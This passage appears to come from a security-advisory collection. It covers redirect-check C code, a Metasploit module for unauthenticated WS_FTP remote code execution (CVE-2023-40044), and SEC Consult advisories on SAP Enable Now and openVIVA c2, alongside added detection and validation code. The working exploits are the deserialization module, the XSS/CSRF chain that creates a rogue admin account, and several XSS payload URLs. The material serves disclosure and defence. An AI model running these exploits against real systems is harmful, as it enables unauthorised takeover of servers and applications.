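    const char *auth;
    if (strncmp(url, "http://", 7) == 0)       auth = url + 7;
    else if (strncmp(url, "https://", 8) == 0) auth = url + 8;
    else return false;

    size_t n = strcspn(auth, "/?#");           /* length of the authority */
    const char *at = memchr(auth, '@', n);     /* userinfo, if present, ends at '@' */
    if (at) { n -= (size_t)(at + 1 - auth); auth = at + 1; }
    if (auth[0] == '[') {                      /* IPv6 literal: keep the brackets */
        const char *close = memchr(auth, ']', n);
        if (!close) return false;
        n = (size_t)(close + 1 - auth);
    } else {
        const char *colon = memchr(auth, ':', n);
        if (colon) n = (size_t)(colon - auth);
    }
    if (n == 0 || n >= cap) return false;
    memcpy(host, auth, n);
    host[n] = '\0';
    return true;
}

/* DNS names are case-insensitive, so compare hosts that way. */
static bool host_equals(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return false;
    return *a == '\0' && *b == '\0';
}

/* Hardened check: the redirect target's host must equal the server name exactly. */
bool strict_check(const char *url, const char *server_name)
{
    char host[256];
    return url_host(url, host, sizeof host) && host_equals(host, server_name);
}

int main(void)
{
    const char *server = "sap-app.example.com";   /* assumed ~server_name */
    const char *urls[] = {                         /* constructed test inputs */
        "https://sap-app.example.com/sap/bc/bsp/sap/it00/start.htm",
        "http://127.0.0.1:8080/?sap-app.example.com",        /* the advisory's bypass shape */
        "http://sap-app.example.com@evil.example/",           /* server name as userinfo */
        "http://sap-app.example.com.evil.example/",           /* server name as a prefix label */
        "https://SAP-APP.example.com:44300/sap/bc/bsp/sap/it00/start.htm",
    };
    for (size_t i = 0; i < sizeof urls / sizeof urls[0]; i++)
        printf("weak=%d strict=%d  %s\n", weak_check(urls[i], server),
               strict_check(urls[i], server), urls[i]);
    return 0;
}
```

The weak check accepts all five constructed URLs; the strict check accepts only the two whose host is the server itself. Relative paths and scheme-relative URLs such as //evil.example/ are rejected by url_host(), so a caller that wants to allow local relative redirects has to accept those explicitly rather than by falling back to a substring match.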
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code<br /> execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server<br /> prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability<br /> was originally discovered by AssetNote.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-40044'],<br /> ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],<br /> ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],<br /> ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044']<br /> ],<br /> 'DisclosureDate' => '2023-09-27',<br /> 'Platform' => %w[win],<br /> 'Arch' => [ARCH_CMD],<br /> # 5000 will allow the powershell payloads to work as they require ~4200 bytes. 
Notably, the ClaimsPrincipal and<br /> # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g.<br /> # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume<br /> # all the available payload space via ./modules/nops/cmd/generic.rb).<br /> 'Payload' => { 'Space' => 5000 },<br /> 'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`.<br /> 'Targets' => [<br /> [<br /> 'Windows', {}<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in<br /> # the IIS logs as to what the request is for, however the user can change this as needed if required.<br /> Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. 
Must begin with /AHT/', '/AHT/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/AHT/AHT_UI/public/index.html'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> title = Nokogiri::HTML(res.body).xpath('//head/title')&.text<br /><br /> # We verify the target is running the AHT module by inspecting the HTML head's title.<br /> if title == 'Ad Hoc Transfer'<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/AHT/AHT_UI/public/js/app.min.js'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # The patched versions were released in September 2023. We can query the date stamp in the app.min.js file<br /> # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,<br /> # but if it was built in Sept 2023 or later, it is not vulnerable.<br /><br /> if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}<br /> day = ::Regexp.last_match(1).to_i<br /> month = ::Regexp.last_match(2).to_i<br /> year = ::Regexp.last_match(3).to_i<br /><br /> description = "Detected a build date of #{day}-#{month}-#{year}"<br /><br /> if year > 2023 || (year == 2023 && month >= 9)<br /> return CheckCode::Safe(description)<br /> end<br /><br /> return CheckCode::Appears(description)<br /> end<br /><br /> # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.<br /> return CheckCode::Detected<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> unless datastore['TARGET_URI'].start_with? '/AHT/'<br /> fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')<br /> end<br /><br /> # All of these gadget chains will work. 
We pick a random one during exploitation.<br /> chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties]<br /><br /> gadget = ::Msf::Util::DotNetDeserialization.generate(<br /> payload.encoded,<br /> gadget_chain: chains.sample,<br /> formatter: :BinaryFormatter<br /> )<br /><br /> # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.<br /> tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]<br /><br /> message = Rex::MIME::Message.new<br /><br /> part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)<br /><br /> part.header.set('name', rand_text_alphanumeric(8))<br /><br /> res = send_request_cgi(<br /> {<br /> 'uri' => normalize_uri(datastore['TARGET_URI']),<br /> 'ctype' => 'multipart/form-data; boundary=' + message.bound,<br /> 'method' => 'POST',<br /> 'data' => message.to_s<br /> }<br /> )<br /><br /> unless res&.code == 302<br /> fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability')<br /> end<br /> end<br /><br />end<br /></code></pre>
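As an added defender-side example (not part of the Metasploit module above and not Rapid7's code), the following Node.js script inspects a captured multipart request body for the pattern the module sends: a part whose body starts with "::AHT_DEFAULT_UPLOAD_PARAMETER::" or "::AHT_UPLOAD_PARAMETER::" followed by a base64-encoded .NET BinaryFormatter stream. The sample body, boundary and part names are constructed; the base64 blob holds only the BinaryFormatter header record followed by filler bytes, not a gadget chain. Such bodies are visible to a reverse proxy or WAF in front of IIS, not in the IIS W3C log itself, which only records the /AHT/ path the module notes is "less obvious".

```javascript
// Added example (not part of the Metasploit module above): inspect a captured
// multipart/form-data body for the WS_FTP Ad Hoc Transfer deserialization
// pattern. Runs on Node.js without any modules.

// The two tags the module chooses between (from its `tags` array).
const AHT_TAGS = ['AHT_DEFAULT_UPLOAD_PARAMETER', 'AHT_UPLOAD_PARAMETER'];
const TAG_PATTERN = new RegExp('^::(' + AHT_TAGS.join('|') + ')::([A-Za-z0-9+/=\\r\\n]*)');

// A .NET BinaryFormatter stream starts with a SerializationHeaderRecord whose
// typical values are: 00 (record type) 01 00 00 00 (RootId=1)
// FF FF FF FF (HeaderId=-1) 01 00 00 00 (major=1) 00 00 00 00 (minor=0).
// In base64 this is the well-known "AAEAAAD/////AQAAAAAAAAA" prefix.
const BINARYFORMATTER_HEADER = Buffer.from([
  0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
  0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
]);

// Split a multipart body into { headers, body } parts using the boundary from
// the Content-Type header. Sufficient for triage; not a full RFC 2046 parser.
function splitMultipart(body, boundary) {
  const delim = '--' + boundary;
  const text = body.toString('latin1');
  const parts = [];
  for (const chunk of text.split(delim).slice(1)) {
    if (chunk.startsWith('--')) break;            // closing delimiter reached
    const sep = chunk.indexOf('\r\n\r\n');
    if (sep < 0) continue;                         // malformed part, skip it
    const headers = chunk.slice(0, sep).trim();
    let data = chunk.slice(sep + 4);
    if (data.endsWith('\r\n')) data = data.slice(0, -2);
    parts.push({ headers, body: Buffer.from(data, 'latin1') });
  }
  return parts;
}

// Report every part that carries one of the AHT tags, and whether the base64
// that follows decodes to something that starts like a BinaryFormatter stream.
function inspectAhtUpload(body, boundary) {
  const findings = [];
  splitMultipart(body, boundary).forEach((part, index) => {
    const m = TAG_PATTERN.exec(part.body.toString('latin1'));
    if (!m) return;
    const decoded = Buffer.from(m[2].replace(/[\r\n]/g, ''), 'base64');
    const isBinaryFormatter = decoded.length >= BINARYFORMATTER_HEADER.length
      && decoded.subarray(0, BINARYFORMATTER_HEADER.length).equals(BINARYFORMATTER_HEADER);
    findings.push({ part: index, tag: m[1], payloadBytes: decoded.length, isBinaryFormatter });
  });
  return findings;
}

// Constructed sample (not captured from a real server): one benign part and
// one part carrying the tag. The blob is the 17-byte header plus 64 filler
// bytes, not a gadget chain.
const SAMPLE_BOUNDARY = '_Part_12_34567';
const SAMPLE_BLOB = Buffer.concat([BINARYFORMATTER_HEADER, Buffer.alloc(64, 0x41)]).toString('base64');
const SAMPLE_BODY = Buffer.from(
  `--${SAMPLE_BOUNDARY}\r\nContent-Disposition: form-data; name="comment"\r\n\r\nhello\r\n` +
  `--${SAMPLE_BOUNDARY}\r\nContent-Disposition: form-data; name="x9kq2Lm1"\r\n\r\n` +
  `::AHT_DEFAULT_UPLOAD_PARAMETER::${SAMPLE_BLOB}\r\n` +
  `--${SAMPLE_BOUNDARY}--\r\n`, 'latin1');

function demo() {
  return inspectAhtUpload(SAMPLE_BODY, SAMPLE_BOUNDARY);
}
```

A finding with isBinaryFormatter set is a strong signal on its own: the Ad Hoc Transfer UI has no legitimate reason to send a serialized .NET object graph in a form field. Pair it with the IIS log entry (a POST to a /AHT/ path answered with 302, the response code the module treats as success) to confirm the request reached the handler.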
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230927-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities<br /> product: SAP® Enable Now Manager<br /> vulnerable version: 10.6.5 (Build 2804) Cloud Edition<br /> fixed version: May 2023 Release<br /> CVE number: N/A (cloud)<br /> impact: high<br /> homepage: https://www.sap.com/about.html<br /> found: 2022-10-21<br /> by: Paul Serban (Eviden)<br /> Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP Enable Now solution provides advanced in-application help and<br />training capabilities helping you to improve productivity and user<br />adoption, as well as to increase satisfaction of the end-user experience.<br />Create, maintain, and deliver in-application help, learning materials,<br />and documentation content easily."<br /><br />Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now<br /><br /><br />Business recommendation:<br />------------------------<br />Due to the Cloud Edition being affected, the vendor automatically pushed<br />a fix in the production environment in the May 2023 Release.<br /><br />SEC Consult recommends performing a thorough security review conducted by<br />security professionals to identify and resolve potential further critical<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Multiple vulnerabilities were identified that could be chained together in<br />order to allow a remote, unauthenticated attacker to create new administrative<br />user accounts by tricking the victim into clicking a malicious link or visiting<br />a malicious website prepared 
by the attacker.<br /><br /><br />1) Open Redirect/URL Redirection Vulnerability<br />The file download feature of the application contains an unvalidated<br />parameter value that exposes it to an open redirect vulnerability. An<br />attacker can create a malicious URL which would redirect the victim to<br />a malicious site, for example, a phishing site convincing the victim<br />to log in once again.<br /><br />2) Reflected Cross Site Scripting (XSS)<br />A reflected XSS vulnerability was found affecting the same parameter as<br />used in 1). Due to insufficient input validation and output encoding, an<br />attacker can inject arbitrary HTML or JavaScript code into the generated<br />server response, executing it in the browser of the victim. The vulnerability<br />can be exploited, for example, to create new administrative user accounts<br />in the application, thereby fully compromising the application. Any CSRF<br />protection can be bypassed by means of this vulnerability.<br /><br />3) Insufficient Cross-Site Request Forgery (CSRF) Protection<br />No implementation of CSRF protection was detected in the application.<br />Using this vulnerability, an attacker can issue requests in the context<br />of administrative user sessions. This includes critical state changing<br />actions such as user creation or role assignment. Note that in the<br />test environment the option 'Supported Functions' was set to value<br />'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.<br /><br />Certain configurations require this setting to be enabled, e.g. to allow<br />the SEN Workflow Approver extension to submit the data on behalf of the<br />logged-in user to the SAP Enable Now Manager. Without this parameter,<br />the extension will only be able to read the content and workflow information.<br /><br />This indicates that there is an insecure feature which allows the protection<br />mechanism to be disabled globally. 
It could not be clarified if this is the<br />default setting. In any case, the function should still be enhanced to protect<br />critical actions such as functions used in user management or role/permission<br />management even if the mechanism is disabled by configuration.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Open Redirect/URL Redirection Vulnerability<br />The public endpoint /resources/open_file.html is vulnerable to an<br />open redirect via GET parameter 'info'. To verify this vulnerability,<br />it is sufficient to open the following URL in a web browser.<br /><br />https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com<br /><br />After browsing to the above link, the victim gets redirected to<br />www.sec-consult.com in a new browser window opened by the embedded<br />call of function window.open(). Note that neither the attacker nor the<br />victim has to be authenticated for successful exploitation.<br /><br /><br />2) Reflected Cross-Site Scripting (XSS)<br />The public endpoint /resources/open_file.html is affected by an XSS<br />vulnerability in GET parameter 'info'. To verify this vulnerability,<br />it is sufficient to open the following URL in a web browser.<br /><br />https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)<br /><br />After browsing to the above link, an alert window in the victim's browser<br />displays the value of document.domain, i.e. the domain name of the server<br />the page was loaded from. This proves the successful execution of the<br />injected JavaScript code. In fact, any kind of JavaScript code could<br />be injected by the attacker. Note that neither the attacker nor the<br />victim has to be authenticated for successful exploitation.<br /><br /><br />3) Insufficient Cross-Site Request Forgery (CSRF) Protection<br />No CSRF protection can be observed in POST requests sent between the<br />client and server. 
This includes at least the functions "task creation",<br />"user creation", "permission assignment" and "role/group assignment". Note<br />that this vulnerability appears to only affect systems where the CSRF protection<br />is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'<br />in the server settings. Although this setting can be reverted, it is advised<br />to have the protection enabled for critical operations such as user creation<br />or permission assignment at any time (also when the option is set).<br /><br />Several of the vulnerabilities above can be chained together by an<br />unauthenticated attacker. Considering the types of vulnerabilities,<br />there are multiple exploitation scenarios. In our example we will<br />create a link that, when clicked by an administrator victim, will<br />create a new admin account. For this attack to work, we first need<br />to gather some information. To create an account, we need to know two<br />important values: the OU and the UID. The OU represents the Organizational<br />Unit unique identifier. The UID here represents the unique Group ID<br />of our target group where we want our new user to be added. Both values<br />can be obtained with a simple GET request to the endpoint /self/group. 
The following listing shows the server response.<br /><br />------------------------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Cache-Control: no-cache, no-store, must-revalidate<br />Expires: 0<br />Vary: Origin<br />Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;<br />Content-Type: text/json;charset=UTF-8<br />Server: SAP<br />Connection: close<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />Content-Length: 396<br /><br />{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086",<br />"ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":<br />"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name<br />":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU<br />10C ","active":true}]}}<br />------------------------------------------------------------------------------------------------<br /><br /><br />Finally, in order for the attack to succeed, the attacker needs<br />the victim (logged in as administrator) to first send a request to<br />the above endpoint and then a POST request to the endpoint /!/user<br />to actually create the new user account with the administrator<br />role assigned, using the values taken from the previous response.<br />These interactions can be scripted using the following ten lines<br />of JavaScript code.<br /><br />------------------------------------------------------------------------------------------------<br />var req1 = new XMLHttpRequest();<br />req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);<br />req1.withCredentials = true;<br />req1.send();<br />var obj = JSON.parse(req1.responseText).response;<br />for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};<br />var req2 = new 
XMLHttpRequest();<br />req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);<br />req2.withCredentials = true;<br />req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));<br />------------------------------------------------------------------------------------------------<br /><br />We can base64-encode this payload and pass it to the JavaScript eval(atob())<br />function using the XSS vulnerability in the file download feature (seen in 2.).<br />The link could then be shortened to enhance the likelihood of successful<br />exploitation. This can be achieved, for example, by leveraging the Open Redirect<br />vulnerability (seen in 1.) to redirect the victim to an attacker-controlled<br />website and trigger the above payload, making the attack more likely to<br />succeed. If the victim is logged into the application and is part of<br />the Administrator group, when they click on this link, a new admin<br />account will be instantly created. 
The attacker then can log in and has<br />full control over the application.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the software were found to be vulnerable during our tests:<br /><br />- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-08: Contacting vendor via secure@sap.com<br />2022-11-10: Vendor requested screenshots and steps to reproduce<br />2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce<br /> and screenshots weren't available at that time<br />2022-11-10: Vendor confirmed issues are under review<br />2022-11-18: Contacted vendor to request an update<br />2022-11-18: Vendor confirmed issues are still under review<br />2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to<br /> the Engineering Team<br />2023-02-02: Contacted vendor to request an update<br />2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a<br /> release schedule.<br />2023-02-07: Vendor confirmed fix was deployed to production for ticket no #2280196564<br />2023-04-14: Contacted vendor to request update on ticket no #2280196563 fix<br />2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release<br />2023-05-08: Vendor confirmed fix was deployed to production for 2280196563<br />2023-09-27: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Due to the Cloud Edition being affected, the vendor automatically pushed<br />a fix in the production environment in the May 2023 Release.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult 
Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF P. Serban, F. Hagg / @2023<br /><br /></code></pre>
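As an added example (not SAP's code and not part of the advisory), the following Node.js snippet shows the two server-side checks the findings above call for: validating the 'info' parameter of a download page like /resources/open_file.html before it is handed to window.open(), which closes both the open redirect (1) and the javascript: URL injection (2), and a CSRF guard that keeps protecting critical routes even when a global switch like 'DISABLE-CSRF-PROTECTION' is set (3). The request and session objects are a constructed model, only /!/user is taken from the advisory as a critical route, and the site origin and token values are made up.

```javascript
// Added example, not SAP's code. Runs on Node.js and uses only the global
// WHATWG URL class.

// Returns an absolute URL string that is safe to open, or null to reject.
// The URL parser, not a string prefix check, decides the scheme, so leading
// whitespace, mixed-case schemes ("JavaScript:") and protocol-relative
// "//evil.example" inputs are all classified correctly.
function resolveOpenTarget(info, siteOrigin, allowedOrigins = []) {
  if (typeof info !== 'string' || info.length === 0 || info.length > 2048) return null;
  let url;
  try {
    url = new URL(info, siteOrigin); // relative paths resolve against the site itself
  } catch (e) {
    return null;                      // unparseable input is rejected
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null; // rejects javascript:, data:, ...
  const permitted = new Set([siteOrigin, ...allowedOrigins]);
  if (!permitted.has(url.origin)) return null; // blocks the open redirect to foreign hosts
  return url.href;
}

// Routes that must keep CSRF protection regardless of configuration. Only
// /!/user (user creation) is named in the advisory; the role/permission
// endpoints of a real deployment would be added here (paths not shown above).
const CRITICAL_ROUTES = ['/!/user'];

// Origin of the request as the browser asserts it: the Origin header, or the
// Referer's origin as a fallback. Null when neither is usable.
function requestOrigin(headers) {
  if (headers.origin) return headers.origin;
  if (headers.referer) {
    try { return new URL(headers.referer).origin; } catch (e) { return null; }
  }
  return null;
}

// req: { method, path, headers } with lower-case header names (constructed model);
// session: { siteOrigin, csrfToken } of the logged-in user;
// config.disableCsrfProtection models the global 'DISABLE-CSRF-PROTECTION' switch.
function csrfCheck(req, session, config = { disableCsrfProtection: false }) {
  if (['GET', 'HEAD', 'OPTIONS'].includes(req.method)) return { ok: true, reason: 'safe method' };
  const headers = req.headers || {};
  const critical = CRITICAL_ROUTES.some((p) => req.path === p || req.path.startsWith(p + '/'));
  // The switch may relax protection for ordinary routes, never for critical ones.
  if (config.disableCsrfProtection && !critical) return { ok: true, reason: 'protection disabled by configuration' };
  // Same-origin check first: browsers attach Origin to cross-site POSTs and a page cannot strip it.
  if (requestOrigin(headers) !== session.siteOrigin) return { ok: false, reason: 'cross-site origin' };
  // Then the synchronizer token, carried in a header a cross-site form cannot set.
  // (Use a constant-time comparison in production code.)
  const token = headers['x-csrf-token'];
  if (!token || token !== session.csrfToken) return { ok: false, reason: 'missing or wrong token' };
  return { ok: true, reason: 'origin and token verified' };
}
```

resolveOpenTarget would have returned null for both PoC URLs in the advisory (the foreign https origin and the javascript: scheme), and csrfCheck would have refused the scripted POST to /!/user even on an instance where the global protection was switched off, because the request carries no valid token for the victim's session.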
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230925-0 ><br />=======================================================================<br /> title: Stored Cross-Site Scripting<br /> product: mb Support broker management solution openVIVA c2<br /> vulnerable version: <20220801<br /> fixed version: =>20220801<br /> CVE number: CVE-2022-39172<br /> impact: Medium<br /> homepage: https://mbsupport.de<br /> found: 2022-03-16<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Support small and medium-sized companies as well as large corporate customers<br />with just one software. Sales , inventory management , billing , e-mail and<br />much more - with openVIVA c2 you get everything in one application. Without<br />system disruption and in one database, you can do all the work of an insurance<br />broker with one piece of software.<br /><br />Connect brokers, intermediaries, insurers and customers directly with our<br />self-service portals . 
Strengthen your customer relationships and work more<br />efficiently yourself.<br /><br />mb Support offers portals for intermediaries as well as industrial and<br />commercial customers and tailor-made portal solutions for insurers, brokers and<br />private customers."<br /><br />Source: https://mbsupport.de/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an updated version to their customers.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected by other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting (CVE-2022-39172)<br />An authenticated attacker with privileges of the role 'user' can create a new<br />'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker<br />to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher'<br />(persons mainly responsible) can be used to assign this 'Vorgang' to another user<br />who will receive it in their overview list. This results in a targeted stored<br />XSS attack.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting (CVE-2022-39172)<br />The application is developed on top of Oracle Apex<br />(https://apex.oracle.com/en/) which provides several security features to<br />developers. Two of those are request replay protection and parameter<br />checksumming which make it hard to develop a PoC which only consists of<br />requests and responses. Therefore, this PoC is a textual description of the<br />required steps, supplemented with pictures. Additionally, the library<br />'AlertifyJS' is used, which changes the appearance of alert popups; this<br />can be confusing if you are used to the standard alert popups.<br /><br />To execute the attack the following steps have to be performed:<br />1. 
Log in to openVIVA c2<br />2. Go to 'mein openVIVA' (my openVIVA)<br />3. Click on 'Vorgangszuordnung' (Process Assignment)<br />4. Click on 'Neuen Vorgang starten' (Start new Process)<br />5. In the new form enter the XSS payload into the 'Name' field, for example<br /> "<script>alert('XSS')</script>"<br />6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible)<br />7. Click on the three dots<br />8. Click on 'Speichern' (save)<br /><br />The victim now has a new 'Vorgang' in their inbox. If the 'Vorgänge' menu is clicked,<br />the victim is redirected to the list of assigned 'Vorgänge'. Because our payload<br />is in the name field, it is executed as soon as the list of processes is loaded.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* openVIVA c2 20220101<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-03-30: Contacting vendor through email followed by a telephone call,<br /> sent the advisory<br />2022-04-20: Asking for status update<br />2022-04-22: Patch release is planned for August<br />2022-07-26: Status call: Patch exists, advisory release delayed until<br /> rollout to all customers is complete (~ August 2023(!))<br />2023-09-18: Asking for a status update and patch download information.<br /> Vendor response: no public link available; few customers<br /> still have no patch.<br />2023-09-25: Release of security advisory<br /><br /><br /><br />Solution:<br />---------<br />Upgrade to version 2022-08-01 or later. 
The vendor has no public<br />download link available as all customers will be patched according<br />to their maintenance contract.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult? Send us your application<br />https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2023<br /><br /></code></pre>
